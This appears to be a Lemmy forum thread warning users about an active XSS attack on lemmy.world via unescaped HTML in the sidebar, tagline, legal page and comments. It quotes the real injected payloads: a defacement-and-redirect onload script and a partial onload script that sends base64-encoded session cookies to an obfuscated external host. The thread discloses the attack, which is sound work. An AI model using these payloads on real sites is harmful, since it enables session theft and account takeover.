this post was submitted on 10 Jul 2023
300 points (99.7% liked)

Lemmy

12524 readers
1 users here now

Everything about Lemmy; bugs, gripes, praises, and advocacy.

For discussion about the lemmy.ml instance, go to !meta@lemmy.ml.

founded 5 years ago
MODERATORS
nutomic@lemmy.ml
300
(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field (sh.itjust.works)
submitted 2 years ago* (last edited 2 years ago) by AlmightySnoo@sh.itjust.works to c/lemmy@lemmy.ml
119 comments fedilink hide all child comments
 

DO NOT OPEN THE "LEGAL" PAGE

lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the "Legal" page it shows the HTML unescaped, but fortunately (for now) he's using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
you are viewing a single comment's thread
view the rest of the comments
[–] muddybulldog@mylemmy.win 62 points 2 years ago* (last edited 2 years ago) (21 children)

Not sure if it's actually XSS. Lemmy.world did have an admin account compromise so it could've been done locally.

It actually looks like it may be being propagated via comments. I received more than a handful from lemmy.world and it appears they were in the process of deleting them before they went dark. I nuked the remaining ones by hand but you can see that lemmy.blahaj.zone still has the same few remaining... https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll

[–] AlmightySnoo@sh.itjust.works 40 points 2 years ago* (last edited 2 years ago) (13 children)

Wow you're right, so it's not just sidebars, it's the whole Markdown parser:

He encoded the URL in ASCII.

[–] muddybulldog@mylemmy.win 20 points 2 years ago* (last edited 2 years ago) (1 children)

The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

onload="fetch(String.fromCharCode(104,116,116,112,115, 58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47) +btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))

[–] erre@lemmy.ml 8 points 2 years ago

Yeah they're stealing jwt tokens and noting when they're admins.

https://lemmy.sdf.org/comment/850269

load more comments (11 replies)
load more comments (18 replies)